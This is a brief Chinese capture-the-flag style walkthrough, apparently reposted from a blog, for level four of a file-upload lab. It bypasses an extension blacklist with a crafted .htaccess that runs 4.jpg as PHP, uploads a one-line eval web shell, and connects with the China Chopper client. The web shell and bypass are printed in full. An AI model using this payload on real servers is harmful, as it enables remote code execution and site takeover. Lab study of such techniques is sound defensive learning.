第四关在后端使用了黑名单,并过滤了空格,点,以及大小写 , 但未过滤 .htaccess(分布式配置) , 固此关卡使用 分布式配置文件绕过黑名单
准备一个 .htaccess 文件 , 内容如下
<FilesMatch "4.jpg">
SetHandler application/x-httpd-php
</FilesMatch>准备一个 4.jpg 文件 , 内容为一句话木马
<?php eval($_POST[-7]);?>先上传 .htaccess 文件 , 该文件可使其所在目录下的所有文件以php文件执行
再上传 4.jpg 文件 , 此文件会被当做php文件执行
右键 复制文件路径 , 并使用菜刀链接
链接成功
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/118423723